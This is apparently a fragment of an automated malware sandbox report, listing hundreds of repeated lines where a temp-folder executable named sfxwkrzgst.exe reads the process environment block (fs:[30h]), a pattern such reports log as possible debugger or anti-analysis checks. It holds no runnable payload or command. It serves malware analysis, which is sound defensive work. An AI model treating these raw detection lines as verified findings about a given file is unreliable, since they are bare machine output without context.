          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378A62 mov eax, dword ptr fs:[00000030h]4_2_01378A62
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136EA55 mov eax, dword ptr fs:[00000030h]4_2_0136EA55
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01334257 mov eax, dword ptr fs:[00000030h]4_2_01334257
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9240 mov eax, dword ptr fs:[00000030h]4_2_012A9240
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9240 mov eax, dword ptr fs:[00000030h]4_2_012A9240
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9240 mov eax, dword ptr fs:[00000030h]4_2_012A9240
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9240 mov eax, dword ptr fs:[00000030h]4_2_012A9240
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A52A5 mov eax, dword ptr fs:[00000030h]4_2_012A52A5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BAAB0 mov eax, dword ptr fs:[00000030h]4_2_012BAAB0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BAAB0 mov eax, dword ptr fs:[00000030h]4_2_012BAAB0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DFAB0 mov eax, dword ptr fs:[00000030h]4_2_012DFAB0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DD294 mov eax, dword ptr fs:[00000030h]4_2_012DD294
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DD294 mov eax, dword ptr fs:[00000030h]4_2_012DD294
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2AE4 mov eax, dword ptr fs:[00000030h]4_2_012D2AE4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF mov eax, dword ptr fs:[00000030h]4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2ACB mov eax, dword ptr fs:[00000030h]4_2_012D2ACB
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378D34 mov eax, dword ptr fs:[00000030h]4_2_01378D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0132A537 mov eax, dword ptr fs:[00000030h]4_2_0132A537
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136E539 mov eax, dword ptr fs:[00000030h]4_2_0136E539
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4D3B mov eax, dword ptr fs:[00000030h]4_2_012D4D3B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4D3B mov eax, dword ptr fs:[00000030h]4_2_012D4D3B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4D3B mov eax, dword ptr fs:[00000030h]4_2_012D4D3B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AAD30 mov eax, dword ptr fs:[00000030h]4_2_012AAD30
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B3D34 mov eax, dword ptr fs:[00000030h]4_2_012B3D34
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CC577 mov eax, dword ptr fs:[00000030h]4_2_012CC577
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CC577 mov eax, dword ptr fs:[00000030h]4_2_012CC577
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E3D43 mov eax, dword ptr fs:[00000030h]4_2_012E3D43
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01323540 mov eax, dword ptr fs:[00000030h]4_2_01323540
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01353D40 mov eax, dword ptr fs:[00000030h]4_2_01353D40
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C7D50 mov eax, dword ptr fs:[00000030h]4_2_012C7D50
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D35A1 mov eax, dword ptr fs:[00000030h]4_2_012D35A1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D1DB5 mov eax, dword ptr fs:[00000030h]4_2_012D1DB5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D1DB5 mov eax, dword ptr fs:[00000030h]4_2_012D1DB5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D1DB5 mov eax, dword ptr fs:[00000030h]4_2_012D1DB5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013705AC mov eax, dword ptr fs:[00000030h]4_2_013705AC
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013705AC mov eax, dword ptr fs:[00000030h]4_2_013705AC
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A2D8A mov eax, dword ptr fs:[00000030h]4_2_012A2D8A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2581 mov eax, dword ptr fs:[00000030h]4_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2581 mov eax, dword ptr fs:[00000030h]4_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2581 mov eax, dword ptr fs:[00000030h]4_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2581 mov eax, dword ptr fs:[00000030h]4_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D82 mov eax, dword ptr fs:[00000030h]4_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DFD9B mov eax, dword ptr fs:[00000030h]4_2_012DFD9B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DFD9B mov eax, dword ptr fs:[00000030h]4_2_012DFD9B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01358DF1 mov eax, dword ptr fs:[00000030h]4_2_01358DF1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BD5E0 mov eax, dword ptr fs:[00000030h]4_2_012BD5E0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BD5E0 mov eax, dword ptr fs:[00000030h]4_2_012BD5E0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136FDE2 mov eax, dword ptr fs:[00000030h]4_2_0136FDE2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136FDE2 mov eax, dword ptr fs:[00000030h]4_2_0136FDE2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136FDE2 mov eax, dword ptr fs:[00000030h]4_2_0136FDE2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136FDE2 mov eax, dword ptr fs:[00000030h]4_2_0136FDE2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov ecx, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326DC9 mov eax, dword ptr fs:[00000030h]4_2_01326DC9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DBC2C mov eax, dword ptr fs:[00000030h]4_2_012DBC2C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01361C06 mov eax, dword ptr fs:[00000030h]4_2_01361C06
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326C0A mov eax, dword ptr fs:[00000030h]4_2_01326C0A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326C0A mov eax, dword ptr fs:[00000030h]4_2_01326C0A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326C0A mov eax, dword ptr fs:[00000030h]4_2_01326C0A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326C0A mov eax, dword ptr fs:[00000030h]4_2_01326C0A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0137740D mov eax, dword ptr fs:[00000030h]4_2_0137740D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0137740D mov eax, dword ptr fs:[00000030h]4_2_0137740D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0137740D mov eax, dword ptr fs:[00000030h]4_2_0137740D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C746D mov eax, dword ptr fs:[00000030h]4_2_012C746D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DAC7B mov eax, dword ptr fs:[00000030h]4_2_012DAC7B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB477 mov eax, dword ptr fs:[00000030h]4_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133C450 mov eax, dword ptr fs:[00000030h]4_2_0133C450
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133C450 mov eax, dword ptr fs:[00000030h]4_2_0133C450
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DA44B mov eax, dword ptr fs:[00000030h]4_2_012DA44B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364496 mov eax, dword ptr fs:[00000030h]4_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B849B mov eax, dword ptr fs:[00000030h]4_2_012B849B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326CF0 mov eax, dword ptr fs:[00000030h]4_2_01326CF0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326CF0 mov eax, dword ptr fs:[00000030h]4_2_01326CF0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01326CF0 mov eax, dword ptr fs:[00000030h]4_2_01326CF0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013614FB mov eax, dword ptr fs:[00000030h]4_2_013614FB
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378CD6 mov eax, dword ptr fs:[00000030h]4_2_01378CD6
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A4F2E mov eax, dword ptr fs:[00000030h]4_2_012A4F2E
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A4F2E mov eax, dword ptr fs:[00000030h]4_2_012A4F2E
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB73D mov eax, dword ptr fs:[00000030h]4_2_012CB73D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB73D mov eax, dword ptr fs:[00000030h]4_2_012CB73D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DE730 mov eax, dword ptr fs:[00000030h]4_2_012DE730
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133FF10 mov eax, dword ptr fs:[00000030h]4_2_0133FF10
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133FF10 mov eax, dword ptr fs:[00000030h]4_2_0133FF10
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DA70E mov eax, dword ptr fs:[00000030h]4_2_012DA70E
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DA70E mov eax, dword ptr fs:[00000030h]4_2_012DA70E
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0137070D mov eax, dword ptr fs:[00000030h]4_2_0137070D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0137070D mov eax, dword ptr fs:[00000030h]4_2_0137070D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CF716 mov eax, dword ptr fs:[00000030h]4_2_012CF716
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BFF60 mov eax, dword ptr fs:[00000030h]4_2_012BFF60
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378F6A mov eax, dword ptr fs:[00000030h]4_2_01378F6A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BEF40 mov eax, dword ptr fs:[00000030h]4_2_012BEF40
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327794 mov eax, dword ptr fs:[00000030h]4_2_01327794
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327794 mov eax, dword ptr fs:[00000030h]4_2_01327794
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327794 mov eax, dword ptr fs:[00000030h]4_2_01327794
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B8794 mov eax, dword ptr fs:[00000030h]4_2_012B8794
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E37F5 mov eax, dword ptr fs:[00000030h]4_2_012E37F5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135FE3F mov eax, dword ptr fs:[00000030h]4_2_0135FE3F
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AE620 mov eax, dword ptr fs:[00000030h]4_2_012AE620
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AC600 mov eax, dword ptr fs:[00000030h]4_2_012AC600
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AC600 mov eax, dword ptr fs:[00000030h]4_2_012AC600
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AC600 mov eax, dword ptr fs:[00000030h]4_2_012AC600
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D8E00 mov eax, dword ptr fs:[00000030h]4_2_012D8E00
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DA61C mov eax, dword ptr fs:[00000030h]4_2_012DA61C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DA61C mov eax, dword ptr fs:[00000030h]4_2_012DA61C
